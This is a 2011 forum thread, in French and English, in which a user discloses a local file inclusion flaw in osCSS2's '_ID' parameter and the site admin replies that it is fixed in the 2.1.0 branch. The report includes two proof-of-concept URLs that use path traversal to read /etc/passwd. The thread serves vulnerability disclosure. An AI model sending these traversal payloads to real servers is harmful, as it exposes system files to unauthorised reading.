osCSS2 "_ID" parameter Local file inclusion

After install , protect your shop, and alert security

Protection de votre boutique après installation , et suivi des alertes de sécurité

osCSS2 "_ID" parameter Local file inclusion

Messagepar sschurtz » Mar 08 Nov 2011, 17:56

Hello,

i will inform you about a LFI in the latest version of osCSS2 in den "_ID" parameter!

PoC-Exploit

http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd

Best Regards,
sschurtz
sschurtz
Membre inactif
 
Messages: 1
Inscription: Mar 08 Nov 2011, 17:49

Re: osCSS2 "_ID" parameter Local file inclusion

Messagepar oscim » Mar 08 Nov 2011, 18:35

Hello

Thank for this alert

This reported in
http://dev.oscss.org/task/892

This update code is reported in svn branche 2.1.0 Stable version .

Ps: The development version, the 2.1.1, seeks to improve safety.
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1641
Inscription: Mar 25 Sep 2007, 10:33


Retourner vers Securité / Security

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité

cron